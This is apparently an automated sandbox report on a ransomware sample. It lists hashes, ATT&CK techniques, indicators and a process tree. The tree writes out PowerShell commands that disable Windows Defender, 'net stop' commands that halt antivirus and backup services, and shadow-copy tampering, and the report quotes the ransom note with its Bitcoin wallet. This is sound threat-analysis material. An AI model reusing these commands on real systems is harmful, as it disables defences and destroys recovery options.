1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
49s
max time network
71s
platform
windows10_x64
resource
win10v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
Size

175KB
MD5

da09586ba925a20faa4a2879697c9238
SHA1

ab6ca1d039ac2d54a811486d731ebf94ad61bf47
SHA256

5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd
SHA512

80f8b6a17fe17192244a223c8b6618b70a19e8bd0cb5179b1b058c455e36c32f53c2e7402e25144e3bbb800c56ef0ad2ac6a363c4d1615ff1ea84a0c1ab371e1

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\Pictures\ExportPush.png.crypted	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

Drops startup file 1 IoCs

Processes:

5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
5344	vssadmin.exe
5688	vssadmin.exe
4940	vssadmin.exe
5556	vssadmin.exe
5264	vssadmin.exe
4884	vssadmin.exe
5668	vssadmin.exe
5624	vssadmin.exe
5524	vssadmin.exe
5852	vssadmin.exe
5880	vssadmin.exe
5440	vssadmin.exe
5588	vssadmin.exe
1824	vssadmin.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

5304 taskkill.exe
5356 taskkill.exe
5100 taskkill.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

7120 PING.EXE

pid	process
5304	taskkill.exe
5356	taskkill.exe
5100	taskkill.exe

pid	process
7120	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exepowershell.exe

pid	process
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
4000	powershell.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
4000	powershell.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
4000	powershell.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
Token: SeDebugPrivilege	4000	powershell.exe
Token: SeIncreaseQuotaPrivilege	4000	powershell.exe
Token: SeSecurityPrivilege	4000	powershell.exe
Token: SeTakeOwnershipPrivilege	4000	powershell.exe
Token: SeLoadDriverPrivilege	4000	powershell.exe
Token: SeSystemProfilePrivilege	4000	powershell.exe
Token: SeSystemtimePrivilege	4000	powershell.exe
Token: SeProfSingleProcessPrivilege	4000	powershell.exe
Token: SeIncBasePriorityPrivilege	4000	powershell.exe
Token: SeCreatePagefilePrivilege	4000	powershell.exe
Token: SeBackupPrivilege	4000	powershell.exe
Token: SeRestorePrivilege	4000	powershell.exe
Token: SeShutdownPrivilege	4000	powershell.exe
Token: SeDebugPrivilege	4000	powershell.exe
Token: SeSystemEnvironmentPrivilege	4000	powershell.exe
Token: SeRemoteShutdownPrivilege	4000	powershell.exe
Token: SeUndockPrivilege	4000	powershell.exe
Token: SeManageVolumePrivilege	4000	powershell.exe
Token: 33	4000	powershell.exe
Token: 34	4000	powershell.exe
Token: 35	4000	powershell.exe
Token: 36	4000	powershell.exe
Token: SeDebugPrivilege	3084	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	3888	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	3812	powershell.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeDebugPrivilege	4136	powershell.exe
Token: SeDebugPrivilege	4292	powershell.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeDebugPrivilege	5304	taskkill.exe
Token: SeDebugPrivilege	5100	taskkill.exe
Token: SeDebugPrivilege	5356	taskkill.exe
Token: SeBackupPrivilege	1320	vssvc.exe
Token: SeRestorePrivilege	1320	vssvc.exe
Token: SeAuditPrivilege	1320	vssvc.exe
Token: SeIncreaseQuotaPrivilege	3812	powershell.exe
Token: SeSecurityPrivilege	3812	powershell.exe
Token: SeTakeOwnershipPrivilege	3812	powershell.exe
Token: SeLoadDriverPrivilege	3812	powershell.exe
Token: SeSystemProfilePrivilege	3812	powershell.exe
Token: SeSystemtimePrivilege	3812	powershell.exe
Token: SeProfSingleProcessPrivilege	3812	powershell.exe
Token: SeIncBasePriorityPrivilege	3812	powershell.exe
Token: SeCreatePagefilePrivilege	3812	powershell.exe
Token: SeBackupPrivilege	3812	powershell.exe
Token: SeRestorePrivilege	3812	powershell.exe
Token: SeShutdownPrivilege	3812	powershell.exe
Token: SeDebugPrivilege	3812	powershell.exe
Token: SeSystemEnvironmentPrivilege	3812	powershell.exe
Token: SeRemoteShutdownPrivilege	3812	powershell.exe
Token: SeUndockPrivilege	3812	powershell.exe
Token: SeManageVolumePrivilege	3812	powershell.exe
Token: 33	3812	powershell.exe
Token: 34	3812	powershell.exe
Token: 35	3812	powershell.exe
Token: 36	3812	powershell.exe
Token: SeIncreaseQuotaPrivilege	3888	powershell.exe
Token: SeSecurityPrivilege	3888	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

pid	process
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

pid	process
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 652 wrote to memory of 4000	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 4000	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 3084	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 3084	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 2616	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 2616	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 3888	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 3888	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 2608	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 2608	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 2488	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 2488	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 3812	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 3812	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 3988	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 3988	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 2160	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 2160	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 1420	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 1420	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 4136	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 4136	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 4292	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 4292	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 4404	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 4404	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	powershell.exe
PID 652 wrote to memory of 4556	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4556	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4596	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4596	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4632	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4632	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4700	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4700	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4732	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4732	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4800	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4800	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4836	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4836	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4904	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4904	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4956	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4956	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4996	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4996	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 5056	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 5056	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 4556 wrote to memory of 5080	4556	net.exe	net1.exe
PID 4556 wrote to memory of 5080	4556	net.exe	net1.exe
PID 4596 wrote to memory of 5092	4596	net.exe	net1.exe
PID 4596 wrote to memory of 5092	4596	net.exe	net1.exe
PID 652 wrote to memory of 4132	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4132	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4312	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4312	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 4632 wrote to memory of 4360	4632	net.exe	net1.exe
PID 4632 wrote to memory of 4360	4632	net.exe	net1.exe
PID 652 wrote to memory of 4604	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 652 wrote to memory of 4604	652	5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe	net.exe
PID 4700 wrote to memory of 4740	4700	net.exe	net1.exe
PID 4700 wrote to memory of 4740	4700	net.exe	net1.exe
PID 4732 wrote to memory of 4992	4732	net.exe	net1.exe
PID 4732 wrote to memory of 4992	4732	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2488
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4404
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:5080
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:4360
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:4740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:4992
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:4800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:4180
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:5092
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:4836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:5252
